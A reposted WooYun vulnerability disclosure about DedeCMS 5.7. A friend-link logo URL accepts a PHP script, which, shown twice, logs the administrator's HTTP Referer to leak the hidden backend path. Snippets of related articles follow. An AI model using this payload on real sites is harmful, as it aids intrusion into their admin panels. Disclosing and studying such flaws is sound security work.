织梦某处设计缺陷导致后台地址泄露 | WooYun-2014-76556 | WooYun

最新推荐文章于 2023-12-19 17:02:25 发布
最新推荐文章于 2023-12-19 17:02:25 发布
阅读量1.8k 收藏
点赞数
分类专栏: dede安全防毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forest_fire/article/details/50944691
版权

漏洞概要关注数(113关注此漏洞

缺陷编号: WooYun-2014-76556

漏洞标题: 织梦某处设计缺陷导致后台地址泄露 

相关厂商: Dedecms

漏洞作者: MuZhU0

提交时间: 2014-09-19 14:26

公开时间: 2014-12-15 14:28

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org

Tags标签: 逻辑错误 设计不当

21人收藏  收藏
分享漏洞:
织梦某处设计缺陷导致后台地址泄露 | WooYun-2014-76556 | WooYun - ☆奋力拼搏☆ - 北方的…郎 0

漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-11-15: 细节向核心白帽子及相关领域专家公开
2014-11-25: 细节向普通白帽子公开
2014-12-15: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

某处设计缺陷,程序对某些东西过滤不严,导致后台地址泄露,仅测试了5.7。目测其它版本同样存在问题。

详细说明:

QQ截图20140918214426.png





DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。

且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。



QQ截图20140918214426.png





X.PHP 代码:



<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("x.jpg");

imagejpeg($img);

imagedestroy($img);

?>



当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。



QQ截图20140918214426.png

漏洞证明:

QQ截图20140918214426.png





X.PHP 代码:



<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("x.jpg");

imagejpeg($img);

imagedestroy($img);

?>



当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。



QQ截图20140918214426.png

修复方案:

应该都明白的,我就不献丑了。

版权声明:转载请注明来源 MuZhU0@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-24 14:28

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价 (共0人评价):
       
登陆后才能进行评分

评论

  1. 2014-09-19 14:27 |  袋鼠妈妈 ( 普通白帽子 | Rank:441 漏洞数:59 | 故乡的原风景.MP3)
    0

    刘明~!

    1#
  2. 2014-09-19 14:38 |  玉林嘎 ( 普通白帽子 | Rank:496 漏洞数:70 )
    0

    这个好!

    2#
  3. 2014-09-19 15:15 |  赈早见琥珀主 ( 路人 | Rank:25 漏洞数:2 )
    0

    目测要火

    3#
  4. 2014-09-19 15:21 |  U神 ( 核心白帽子 | Rank:
北方的刀郎
关注
专栏目录
web渗透--44--web服务器控制台地址泄漏
武天旭的博客
09-22 3891
1、漏洞名称: Web容器控制台地址泄漏、中间件控制台地址泄漏、web服务器控制台地址泄漏 2、漏洞描述: Web控制台是一种基于Web的用户界面,其常常被用于网站后台或者web容器控制台中,其不仅仅局限于容器或者网站管理后台,还包括一些数据库默认地址等。在web安全中,网站系统在泄漏其web容器(中间件)或者数据库的控制台后,存在增加被入侵的风险。常见的web控制台包括以下多种:tomcat、a...
Web漏洞-敏感信息泄露-后台地址爆破
fzy2003的博客
07-06 1943
虽然后台地址泄露无法对网站造成直接威胁,但是后台地址泄露以后能够把网站一些敏感信息暴露,从而增加被攻击的风险。
Tomcat后台地址泄露或者敏感信息泄露
q908544703的博客
06-02 5853
详情:后台地址过于简单地址泄露或者默认后台 解决方案:删除tomcat webapp目录下除了项目模块的其它文件
浅谈“Web服务器控制台地址泄漏”
→_→
05-27 2338
一:漏洞名称: Web容器控制台地址泄漏、中间件控制台地址泄漏、web服务器控制台地址泄漏 描述: Web 控制台是一种基于 Web 的用户界面, 其常常被用于网站后台或者web容器控制台中,其不仅仅局限于容器或者网站管理后台,还包括一些数据库默认地址等。在web安全中,网站系统在泄漏其web容器(中间件)或者数据库的控制台后,存在增加被入侵的风险。常见的web控制台包括以下多种:tomcat、aria2、weblogic、websphere、oracle、jboss、等。这些web的容器控
[dede漏洞]dede 爆后台 路径,dede后台地址查询
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
时间:2013-03-16 23:05来源:未知 作者:admin 点击:1131次http://123.42824.com/1837.html [dede漏洞]dede 爆后台 路径,dede后台地址查询 今天偶尔看到dede可以爆后台路径,具体方法是 1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
正方教务系统php登陆,正方教务管理系统最新版无条件注入&GetShell | wooyun-2015-0122523| WooYun.org...
weixin_35983438的博客
03-21 1767
正方教务系统提供了一系列的WebService接口,然而这些接口并未经过严格的认证,从而导致任何浏览者都可以使用这些接口查询信息。由于其对用户提交的参数未进行过滤,从而导致注入的发生!搜索发现正方教务系统的asmx文件大致有这么些:【1】文件管理接口首先查看file.asmx:checkFile(检查文件是否存在)只要求提供一个文件路径便可以工作。尝试使用soap协议去请求:UpFile2Dir(...
py爬虫wooyun-public-master
04-20
### py爬虫wooyun-public-master #### 知识点一:Py爬虫与Wooyun_public-master的关系 - **Py爬虫**:通常指的是使用Python语言编写的网络爬虫程序。这类程序能够自动地抓取互联网上的数据,并进行处理和分析。 - ...
python爬虫案例wooyun-public-master.zip
最新发布
05-31
"wooyun_public-master.zip"可能包含了某次公开的漏洞挖掘案例,其中"项目说明.zip"可能包含具体的爬虫实现细节和数据解析逻辑。通过对这些案例的学习,我们可以了解如何在实际项目中应用爬虫技术,解决特定的问题...
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 383
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
bohr777#VulDocHub#Zzzcms 1.75 后台爆破+验证码问题1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
DeleCMS织梦系统后台漏洞解决
webxiaoma
12-23 2355
背景:DeleCMS织梦系统后台漏洞挺多的,如果我们处理不好,很容易被别人黑了网站,所以网站的安全性是很重要的! 直接上解决方法:    第一步:我们解决一下织梦系统给我们提示的一些安全要求           1.目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限!         操作连接地址:http://help.dedecms
web渗透--61--web服务器解析漏洞
武天旭的博客
09-23 1504
1、漏洞描述: 服务器相关中间件存在一些解析漏洞,攻击者可通过上传一定格式的文件,被服务器的中间件进行了解析,这样就对系统造成一定危害。常见的服务器解析漏洞涉及的中间件有IIS,apache、nginx等。 2、检测方法 以下为常见的各大web服务器所出现过的解析漏洞汇总,在检测时刻参考:
【thinkphp5】安全建议:隐藏后台登录入口地址
主题模板站的博客
01-06 1253
通过以上的修改后,我们不能再通过 www.test.com/admin 的形式登录后台了,此时我们可以采用 www.test.com/admin_d75KABNWt.php ,其中 admin_d75KABNWt.php 就是我们任意修改的名称。我们都知道后台 www.test.com/admin 是我们最常用的登录入口,方便的同时也留下了隐患,如果你刚好使用了 admin/123456 这种账号密码的方式,会导致我们的后台完全暴露在外。因此我们建议修改后台的登录入口,达到隐藏后台登录入口的效果。
网神防火墙后台用户登录账号泄露漏洞复现
精品博客,你值得一看~
12-19 950
网神防火墙是一款中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击.该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码.
mysql_error_trace.inc 后台地址_DedeCMS下data/mysql_error_trace.inc日志暴露后台地址漏洞修复...
weixin_36163101的博客
02-02 187
DedeCMS下data日志mysql_error_trace.inc记录了很多MYSQL错误记录,如果你曾经在后台访问时候出现过MYSQL错误,就会暴露后台地址,因为这个文件文件名固定,很容易被人给扫到漏洞因此可以改名处理。解决办法一:首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc然后打开 /includ...
dedecms织梦日志暴露后台地址漏洞BUG修复
09-07 556
然后修改/include/common.inc.php中DEDEDATA变量,将:define('DEDEDATA', DEDEROOT.'/data');修改tplcache缓存文件目录:登陆后台 > 系统 > 系统基本参数 > 性能选项,将模板缓存目录值改为 /../data/tplcache。首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc。通过FTP将/data/文件夹移至web根目录的上一级目录;
最全常见Web安全漏洞总结及推荐解决方案
qq_42552574的博客
12-18 7955
常见Web安全漏洞总结及推荐解决方案1.SQL注入:2.不安全的会话管理漏洞:3.任意文件上传:4.任意文件读取:5.任意代码执行:6.越权访问:7.敏感信息泄露:8.XSS跨站脚本攻击:9.CSRF跨站请求伪造:10.用户名/口令暴力爆破:11.弱口令漏洞:12.撞库攻击:13.注册模块设计缺陷:14.短信接口设计缺陷:15.URL重定向漏洞:16.拒绝服务漏洞:17.不足的日志记录和监控:18.业务逻辑漏洞:19.资源控制(预警级别,非漏洞级别)20.网络安全通信协议: 1.SQL注入: SQL注入(
网络安全学习-常见web漏洞的渗xxx透以及防护方法
Python栈
02-27 1130
漏洞描述 CSRF,全称为Cross-Site Request Forgery,跨站请求伪造,是一种网络攻XX击方式,它可以在用户毫不知情的情况 下,以用户的名义伪造请求发送给被攻XX击站点,从而在未授权的情况下进行权限保护内的操作,如修改密码,转账 等。1 短信炸弹 漏洞描述 短信轰炸攻XX击是常见的一种攻XX击,攻XX击者通过网站页面中所提供的发送短信验证码的功能处,通过对其发送数据包的 获取后,进行重放,如果服务器短信平台未做校验的情况时,系统会一直去发送短信,这样就造成了短信轰炸的漏 洞。
wooyun-2010-09336
01-14
这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站进行渗透测试,发现了这个漏洞,并及时向网站管理员报告。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北方的刀郎

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值